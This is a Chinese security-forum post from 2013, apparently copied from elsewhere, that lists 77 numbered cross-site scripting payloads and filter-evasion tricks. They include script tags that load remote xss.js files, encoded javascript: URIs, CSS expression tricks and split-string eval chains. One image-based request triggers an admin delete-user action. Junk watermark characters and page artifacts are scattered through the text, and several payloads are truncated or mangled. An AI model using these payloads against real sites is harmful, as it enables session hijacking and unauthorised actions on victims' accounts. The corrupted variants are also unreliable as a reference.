中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

---

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少，看见好东西Copy过来，不知道有木有童鞋需要Mark的。
(1)普通的XSS JavaScript注入
/ a# k" [+ D8 |4 m1 n6 {* k/ Y3 R- i3 ?<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMG标签无分号无引号
6 W9 y) e9 ]3 T) Y) F<IMG SRC=javascript:alert(‘XSS’)>
& t6 n# w0 W; G. R2 |+ `(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
(5)HTML编码(必须有分号)
) ~8 y" X+ p: u; U<IMG SRC=javascript:alert(“XSS”)>
(6)修正缺陷IMG标签
' p2 K2 V! x0 Z% C& b<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- ^4 \& y9 X% F# T7 D" `
( I0 L+ A7 t# l; e3 Z# ]8 L
(7)formCharCode标签(计算器)
  ]4 s& B; R: g1 B<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+ d! z# W% v* _. j' B1 L1 ?(8)UTF-8的Unicode编码(计算器)
+ d4 P# d* E' M' W* q% ]% d" O<IMG SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
9 e# @7 |" W7 U" p(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; c7 g0 V/ P. g( V, G(13)嵌入式换行符
7 Y& }9 v. e3 Z( {3 }2 n+ |<IMG SRC=”jav ascript:alert(‘XSS’);”>
(14)嵌入式回车
: _  N" z8 p1 _" k: K7 w<IMG SRC=”jav ascript:alert(‘XSS’);”>
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>
(16)解决限制字符(要求同页面)
8 C, \' b* q) f6 p<script>z=’document.’</script>
0 e* W+ L! Y  ^7 X! Y<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
, \/ j+ Y1 Z0 q% \7 e<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
9 f( x. H/ q6 L' o1 r7 P- I<script>z=z+’js></sc’</script>
' }; t! }2 f& @<script>z=z+’ript>”)’</script>
) x6 ]8 H) p# @+ a6 J( Q<script>eval_r(z)</script>
7 G7 H$ O9 Q6 C. L! X' A(17)空字符12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
% B" Z6 l9 w, Q" v- v(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( Z% ]( T- r) a  Q4 @; W% }(19)Spaces和meta前的IMG标签
& k$ z, F5 {  w+ F7 f<IMG SRC=” javascript:alert(‘XSS’);”>
6 q, y" h/ F: Y5 x(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
/ ?# K3 h6 S! Q: D) R' o(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# S/ m* U  l/ R5 h8 S6 |(24)无结束脚本标记(仅火狐等浏览器)
0 U- C; m4 ^, f: W0 y<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# Q4 \: w" i9 H& B/ H9 Y1 l(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半开的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”
(27)双开角括号
) \! Q6 W- i9 M& l6 Y<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
& f4 p' N2 [$ H' X$ w0 ^, \alert(a.source)</SCRIPT>
# j" l3 d# H0 C5 \. t' h/ r(29)换码过滤的JavaScript
' y  Q1 B0 l. p\”;alert(‘XSS’);//
- g8 ^: Z6 m4 k* D" [% l(30)结束Title标签
) w7 P! t2 P. l3 s/ a, a</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
(31)Input Image
! a  W1 R4 N7 g4 b( i' ^<INPUT SRC=”javascript:alert(‘XSS’);”>
# m+ t" u1 {! x(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
# G- E4 l# G& t) S& j2 ](33)BODY标签
<BODY(‘XSS’)>
3 ]) f7 V5 M5 T2 C3 N# Y" m(34)IMG Dynsrc
. \9 }. i. N; [5 Z<IMG DYNSRC=”javascript:alert(‘XSS’)”>
(35)IMG Lowsrc
6 ^" w, g# S. u6 u<IMG LOWSRC=”javascript:alert(‘XSS’)”>
(36)BGSOUND
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
(37)STYLE sheet
* O/ ~/ Z& q; D' h<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
(38)远程样式表
3 [& }% M" s  \<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
(39)List-style-image(列表式)
' O+ e2 @1 ~3 Q<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! ?! W' s4 y9 l7 [2 v! d( d(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
" y. F& x2 I& W% F4 V. h. p(41)META链接url


% T  O# L- B1 w5 v% i<META HTTP-EQUIV=”refresh” CONTENT=”0;
URL=http://;URL=javascript:alert(‘XSS’);”>
5 b- u$ Y2 i: |* q  c! Y+ Q3 O* A* v(42)Iframe
8 x  _6 x4 G' o1 X7 K<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
: d+ h  e1 T0 H+ ?(43)Frame
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
! G0 ~+ K0 J4 W5 r0 chttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
6 u7 o4 @, Z  s! X5 x1 Y9 ~(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
(45)TD
) v8 u* Y- y( U; z" B, F* X<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
# i( ~. Y! }  d. H(46)DIV background-image
3 U1 A. `8 k- J% q9 @<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& h+ v" [( b% G: u) d9 g& v: V(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
4 p% D+ ]0 @* L9 x+ _* K8&13&12288&65279)
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
# J; `8 M, |+ C" r5 A(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# p4 c) R6 j. I4 F(49)STYLE属性分拆表达
4 T+ m0 M& q% \<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
(51)STYLE background-image
" g* T* \0 |& U. W4 I<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
CLASS=XSS></A>
& B# `' }8 A; e" Q, Z(52)IMG STYLE方式
2 ^& ^5 g# s* n8 y, a( Bexppression(alert(“XSS”))’>
(53)STYLE background
<STYLE><STYLE
0 ?8 c; ?6 q9 P* s) v- ytype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
  W$ f' d* U2 c(54)BASE
0 y" R5 ]; N" l+ Q  w<BASE HREF=”javascript:alert(‘XSS’);//”>
* }4 s; a3 W$ q% s! C(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
( D* J$ C- c1 m* z/ C+ q: q( R4 z(56)在flash中使用ActionScrpt可以混进你XSS的代码
' T' J; N# C5 a  ^. a6 [a=”get”;
3 W/ y; @, I. h3 g/ A- O* ~b=”URL(\”";
8 d3 @  d& ?( E9 O( Ic=”javascript:”;
. M+ K5 a  t$ L  id=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
9 l$ j8 U2 F' Y3 }) g6 X<HTML xmlns:xss>
9 |( U2 ]& \+ c% P<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
<xss:xss>XSS</xss:xss>
' s8 @( y  |! c  b</HTML>
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT SRC=””></SCRIPT>
2 s. O. i) D" {/ i7 ~  @  [(59)IMG嵌入式命令,可执行任意命令
9 i! e0 t) c' U8 V+ L  n5 C+ E  [<IMG SRC=”http://www.XXX.com/a.php?a=b”>
(60)IMG嵌入式命令(a.jpg在同服务器)
$ _" ]$ ~$ X; I! l3 d9 u5 iRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
* ?" U5 R6 c, _- K/ O7 U(61)绕符号过滤
- x$ L( L1 E5 f+ [3 {6 O<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(62)
9 ?1 l3 B) o% b/ S* I8 U<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(63)
, k3 ]) K) ?8 p5 t- M! C+ T<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
(64)
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 c  c$ V4 u6 e9 q(65)
& z$ I5 t8 v/ x: E' D+ i. N<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
(66)12-7-1 T00LS - Powered by Discuz! Board
5 D" Y- N) j) G& V7 J4 F  bhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
7 L/ D1 l$ y3 D- B<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
(67)
% Q# E2 E$ v  l% o( I) d<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
. x7 g2 E1 J9 u4 R</SCRIPT>
(68)URL绕行
<A HREF=”http://127.0.0.1/”>XSS</A>
(69)URL编码
+ @* H3 W7 |7 N0 Y5 n<A HREF=”http://3w.org”>XSS</A>
(70)IP十进制
<A HREF=”http://3232235521″>XSS</A>
(71)IP十六进制
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
; [- A  T! S+ G# J(72)IP八进制
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
/ q4 Z  C; V4 @, O" b0 A(73)混合编码
1 U# n3 o* D0 Z2 a! u& }4 x' L7 D<A HREF=”h
$ n! i3 M( Y0 utt p://6 6.000146.0×7.147/”">XSS</A>
(74)节省[http:]
<A HREF=”//www.google.com/”>XSS</A>
(75)节省[www]
# C0 F4 u7 k: p8 ~1 b<A HREF=”http://google.com/”>XSS</A>
* O4 \, R7 }# W8 Q(76)绝对点绝对DNS
) Z7 E; W+ ~% \* F/ H<A HREF=”http://www.google.com./”>XSS</A>
(77)javascript链接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
; G8 z& z$ F7 ~+ x  K! [) u7 x
4 c7 I! \3 a  Y9 q0 y. V1 H原文地址：http://fuzzexp.org/u/0day/?p=14

9 M, S2 F  E2 d

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2